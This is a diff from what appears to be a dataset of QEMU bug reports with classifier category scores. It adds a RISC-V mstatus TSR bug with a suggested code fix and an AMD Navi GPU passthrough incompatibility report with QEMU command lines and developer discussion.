+ /usr/bin/kvm -id 102 -name win7-01 -chardev socket,id=qmp,path=/var/run/qemu-server/102.qmp,server,nowait -mon chardev=qmp,mode=control -chardev socket,id=qmp-event,path=/var/run/qmeventd.sock,reconnect=5 -mon chardev=qmp-event,mode=control -pidfile /var/run/qemu-server/102.pid -daemonize -smbios type=1,uuid=3ec61114-c30c-4719-aa00-f3f05be22d48 -smp 8,sockets=1,cores=8,maxcpus=8 -nodefaults -boot menu=on,strict=on,reboot-timeout=1000,splash=/usr/share/qemu-server/bootsplash.jpg -vnc unix:/var/run/qemu-server/102.vnc,password -no-hpet -cpu penryn,+lahf_lm,+sep,+kvm_pv_unhalt,+kvm_pv_eoi,hv_spinlocks=0x1fff,hv_vapic,hv_time,hv_reset,hv_vpindex,hv_runtime,hv_relaxed,hv_synic,hv_stimer,hv_ipi,enforce -m 12000 -device pci-bridge,id=pci.2,chassis_nr=2,bus=pci.0,addr=0x1f -device pci-bridge,id=pci.1,chassis_nr=1,bus=pci.0,addr=0x1e -device vmgenid,guid=50deb929-1974-4fd0-9ad3-71722149d568 -device piix3-usb-uhci,id=uhci,bus=pci.0,addr=0x1.0x2 -device usb-tablet,id=tablet,bus=uhci.0,port=1 -device VGA,id=vga,bus=pci.0,addr=0x2 -chardev socket,path=/var/run/qemu-server/102.qga,server,nowait,id=qga0 -device virtio-serial,id=qga0,bus=pci.0,addr=0x8 -device virtserialport,chardev=qga0,name=org.qemu.guest_agent.0 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x3 -iscsi initiator-name=iqn.1993-08.org.debian:01:203582cea152 -drive if=none,id=drive-ide2,media=cdrom,aio=threads -device ide-cd,bus=ide.1,unit=0,drive=drive-ide2,id=ide2,bootindex=200 -drive file=/disk02/prox/images/102/vm-102-disk-0.raw,if=none,id=drive-virtio0,cache=writeback,format=raw,aio=threads,detect-zeroes=on -device virtio-blk-pci,drive=drive-virtio0,id=virtio0,bus=pci.0,addr=0xa,bootindex=100 -drive file=/dev/disk/by-id/ata-WDC_WD80EMAZ-00WJTA0_7SGZLHYC-part1,if=none,id=drive-virtio1,cache=writeback,format=raw,aio=threads,detect-zeroes=on -device virtio-blk-pci,drive=drive-virtio1,id=virtio1,bus=pci.0,addr=0xb -netdev type=tap,id=net0,ifname=tap102i0,script=/var/lib/qemu-server/pve-bridge,downscript=/var/lib/qemu-server/pve-bridgedown,vhost=on -device virtio-net-pci,mac=1e:be:cb:0b:6f:13,netdev=net0,bus=pci.0,addr=0x12,id=net0,bootindex=300 -netdev type=tap,id=net1,ifname=tap102i1,script=/var/lib/qemu-server/pve-bridge,downscript=/var/lib/qemu-server/pve-bridgedown,vhost=on -device virtio-net-pci,mac=EA:76:56:16:2F:D7,netdev=net1,bus=pci.0,addr=0x13,id=net1,bootindex=301 -rtc driftfix=slew,base=localtime -machine type=pc -global kvm-pit.lost_tick_policy=discard
+
+The QEMU project is currently considering to move its bug tracking to
+another system. For this we need to know which bugs are still valid
+and which could be closed already. Thus we are setting older bugs to
+"Incomplete" now.
+
+If you still think this bug report here is valid, then please switch
+the state back to "New" within the next 60 days, otherwise this report
+will be marked as "Expired". Or please mark it as "Fix Released" if
+the problem has been solved with a newer version of QEMU already.
+
+Thank you and sorry for the inconvenience.
+
+
+[Expired for QEMU because there has been no activity for 60 days.]
+
diff --git a/results/classifier/108/other/1851939 b/results/classifier/108/other/1851939
new file mode 100644
index 000000000..b2881cdda
--- /dev/null
+++ b/results/classifier/108/other/1851939
@@ -0,0 +1,36 @@
+semantic: 0.781
+device: 0.768
+performance: 0.721
+other: 0.672
+network: 0.629
+graphic: 0.625
+permissions: 0.623
+socket: 0.600
+files: 0.512
+vnc: 0.479
+debug: 0.421
+boot: 0.380
+KVM: 0.350
+PID: 0.342
+
+RISC-V mstatus TSR bit not correctly implemented
+
+Hi,
+
+since qemu 4.1.0 the TSR bit in mstatus register is supported. But it does not allow for executing sret in m-mode.
+
+From the RISC-V specifications:
+"When TSR=1, attempts to execute SRET while executing in S-mode will raise an illegal instruction
+exception. When TSR=0, this operation is permitted in S-mode."
+
+This means an exception should only be raised when executing in S-mode, but not in M-mode, hence you should change the condition in helper_sret (target/riscv/op_helper.c) from:
+     if (env->priv_ver >= PRIV_VERSION_1_10_0 &&
+          get_field(env->mstatus, MSTATUS_TSR))
+to:
+     if (env->priv_ver >= PRIV_VERSION_1_10_0 &&
+          get_field(env->mstatus, MSTATUS_TSR) && !(env->priv >= PRV_M))
+
+Fixed here:
+https://git.qemu.org/?p=qemu.git;a=commitdiff;h=ed5abf46b3c4
+
+
diff --git a/results/classifier/108/other/1851972 b/results/classifier/108/other/1851972
new file mode 100644
index 000000000..966e2c4f8
--- /dev/null
+++ b/results/classifier/108/other/1851972
@@ -0,0 +1,137 @@
+KVM: 0.700
+permissions: 0.605
+other: 0.554
+vnc: 0.552
+graphic: 0.451
+performance: 0.446
+network: 0.437
+boot: 0.423
+device: 0.413
+debug: 0.403
+socket: 0.389
+files: 0.381
+PID: 0.332
+semantic: 0.311
+
+pc-q35-4.1 and AMD Navi 5700/XT incompatible
+
+Hello,
+
+I am not sure if this qualifies as a "bug"; it is be more of an unknown issue with default settings. However, since the default value of q35 default_kernel_irqchip_split was changed seemingly due to similar user feedback, I thought this was important to share..
+
+AMD Navi 5700/XT vfio-pci passthrough seems incompatible with one/multiple settings in pc-q35-3.1 and higher. The workaround for me is that pc-q35-3.0 still works fine passing through the GPU and official drivers can load/install fine.
+
+The default/generic GPU drivers in a Fedora 30 or Windows 1903 guest do work; the monitor displays the desktop in a 800x600 resolution and things are rendered fine.. so the basic functionality of the card seems fine with pc-q35-4.1.
+
+But attempting to use the official open source AMD driver with the card resulted in a hung kernel for the Fedora 30 guest.. and a BSOD on the Windows 1903 guest immediately during driver install.
+
+I do not see any errors in Qemu command output.. did not investigate other logs or KVM etc, because I am not sure what to look for or how to go about it. Also not sure which combination of the latest q35 default settings are valid combinations to try either, because it seems that multiple things have changed related to pcie-root-port defaults and other machine options. I am happy to run tests and provide feedback if that helps identify the issue.
+
+I am using "Linux arch 5.4.0-rc6-mainline" kernel on ArchLinux host with AMD Navi reset pci quirk patch applied.
+
+My working Qemu command line is this:
+
+QEMU_AUDIO_DRV=pa \
+QEMU_PA_SERVER=/run/user/1000/pulse/native \
+/usr/bin/qemu-system-x86_64 \
+-name windows \
+-m 16g \
+-accel kvm \
+-machine pc-q35-3.0,accel=kvm,pflash0=ovmf0,pflash1=ovmf1 \
+-blockdev node-name=ovmf0,driver=file,filename=/virt/qemu/roms/OVMF_CODE.fd,read-only=on \
+-blockdev node-name=ovmf1,driver=file,filename=/virt/qemu/machines/windows/OVMF_VARS.fd \
+-boot menu=on \
+-global kvm-pit.lost_tick_policy=discard \
+-no-hpet \
+-rtc base=utc,clock=host,driftfix=slew \
+-cpu host,kvm=off,hv_vendor_id=RedHatRedHat,hv_spinlocks=0x1fff,hv_vapic,hv_time,hv_reset,hv_vpindex,hv_runtime,hv_relaxed,hv_synic,hv_stimer \
+-smp sockets=1,cores=4,threads=1 \
+-nodefaults \
+-netdev bridge,br=br0,id=net0 \
+-device virtio-net-pci,netdev=net0,addr=19.0,mac=52:54:00:12:34:77 \
+-device virtio-scsi-pci \
+-blockdev raw,node-name=disk0,cache.direct=off,discard=unmap,file.driver=file,file.aio=threads,file.filename=/virt/qemu/machines/windows/os.raw \
+-device scsi-hd,drive=disk0,rotation_rate=1 \
+-blockdev raw,node-name=disk1,cache.direct=off,discard=unmap,file.driver=file,file.aio=threads,file.filename=/virt/qemu/machines/windows/data.raw \
+-device scsi-hd,drive=disk1,rotation_rate=1 \
+-drive index=0,if=ide,media=cdrom,readonly,file=/virt/qemu/isos/Win10_1903_V2_English_x64.iso \
+-drive index=1,if=ide,media=cdrom,readonly,file=/virt/qemu/isos/virtio-win-0.1.173.iso \
+-device ich9-intel-hda,addr=1b.0 \
+-device hda-output \
+-monitor stdio \
+-display none \
+-vga none \
+-device pcie-root-port,id=pcierp0,chassis=1,slot=1,addr=1c.0,disable-acs=on,multifunction=on \
+-device pcie-root-port,id=pcierp1,chassis=2,slot=2,addr=1c.1,disable-acs=on \
+-device x3130-upstream,bus=pcierp0,id=pcieu0 \
+-device xio3130-downstream,bus=pcieu0,id=pcied0,chassis=11,slot=11 \
+-device vfio-pci,host=03:00.0,bus=pcied0,addr=00.0,multifunction=on \
+-device vfio-pci,host=03:00.1,bus=pcied0,addr=00.1 \
+-device qemu-xhci,addr=1d.0 \
+-device usb-host,vendorid=0x258a,productid=0x0001 \
+-device usb-host,vendorid=0x1bcf,productid=0x0005 ;
+
+Thank you!
+
+Paolo Bonzini commented on IRC: AMD avic requires kernel_irqchip=split.
+
+Can you try using it? (released QEMU uses -machine ...,kernel_irqchip=split, git QEMU expects -accel kernel_irqchip=split).
+
+Hi Philippe, thanks for replying.
+
+The 'kernel_irqchip' parameter is a bit confusing to me. It looks like the documentation was updated from it defaulted to 'off' as a -machine parameter, to now it will default to 'on' as an -accel parameter.
+
+This bug described how the value for 'default_kernel_irqchip_split' parameter had been changed to 'true' in Q35 version 4.0, but then set back to 'false' after discovering that it caused issues for Nvidia gpu passthrough and other things: https://bugs.launchpad.net/qemu/+bug/1826422
+
+However, my problems with the AMD gpu passthrough are present when switching between Q35 3.0 (which does work) and 3.1 (which does not work), both of which would still have 'default_kernel_irqchip_split' set to false.. so it does not seem to me to be related to 'kernel_irqchip'.
+
+Q35 version 3.1 did introduce many other changes:
+
+static void pc_q35_3_1_machine_options(MachineClass *m)
+{
+..
+    pcmc->do_not_add_smb_acpi = true;
+    m->smbus_no_migration_support = true;
+    m->alias = NULL;
+    pcmc->pvh_enabled = false;
+..
+
+GlobalProperty hw_compat_3_1[] = {
+    { "pcie-root-port", "x-speed", "2_5" },
+    { "pcie-root-port", "x-width", "1" },
+..
+
+I thought maybe those could cause the AMD Navi gpu problems, but I am not that knowledgeable about these settings.
+
+Also I do not have the AMD Navi gpu conveniently available anymore to test.
+
+Commit 11bc4a13 (Nov 13, 2019, merged after v4.2.0-rc5) moved the kernel-irqchip parameter to -accel, but I think the default was inadvertently changed to off.  The documentation was changed to say the default is on, but the code change seems to have done the opposite.
+
+I found this when I tested my Windows Server 2016 VMs with the last qemu from git.  Windows boots and runs very slowly unless I add either <ioapic driver='kvm'/> (kernel_irqchip=on) or <timer name="hypervclock" present="yes"/> to the libvirt config.  Using the qemu installed with Ubuntu 19.10 (version 4.0.0), I can reproduce the slowness by explicitly adding kernel_irqchip=off.
+
+Details:
+- Host CPU: Ryzen 3950X (16 core, 32 thread)
+- Host RAM: 64 GiB
+- Host OS: Ubuntu 19.10 64-bit, kernel version 5.5.0-rc4 (commit 738d2902773e + ACS override patch)
+- Guest CPU: host-passthrough, 16 vcpus (8 cores, 2 threads, topoext).
+- Guest RAM: 12 GiB
+- Guest machine type: pc-i440fx-4.0 (BIOS boot)
+- Guest OS: Windows Server 2016, build 1607
+
+Commit d1972be13f ("accel/kvm: Make "kernel_irqchip" default on") fixes the default mixup I described above.  This isn't related to Marshall's issue as it involves qemu 3.0 vs 3.1, but at least it cleans up some confusion.
+
+The QEMU project is currently considering to move its bug tracking to
+another system. For this we need to know which bugs are still valid
+and which could be closed already. Thus we are setting older bugs to
+"Incomplete" now.
+
+If you still think this bug report here is valid, then please switch
+the state back to "New" within the next 60 days, otherwise this report
+will be marked as "Expired". Or please mark it as "Fix Released" if
+the problem has been solved with a newer version of QEMU already.
+
+Thank you and sorry for the inconvenience.
+
+
+[Expired for QEMU because there has been no activity for 60 days.]
+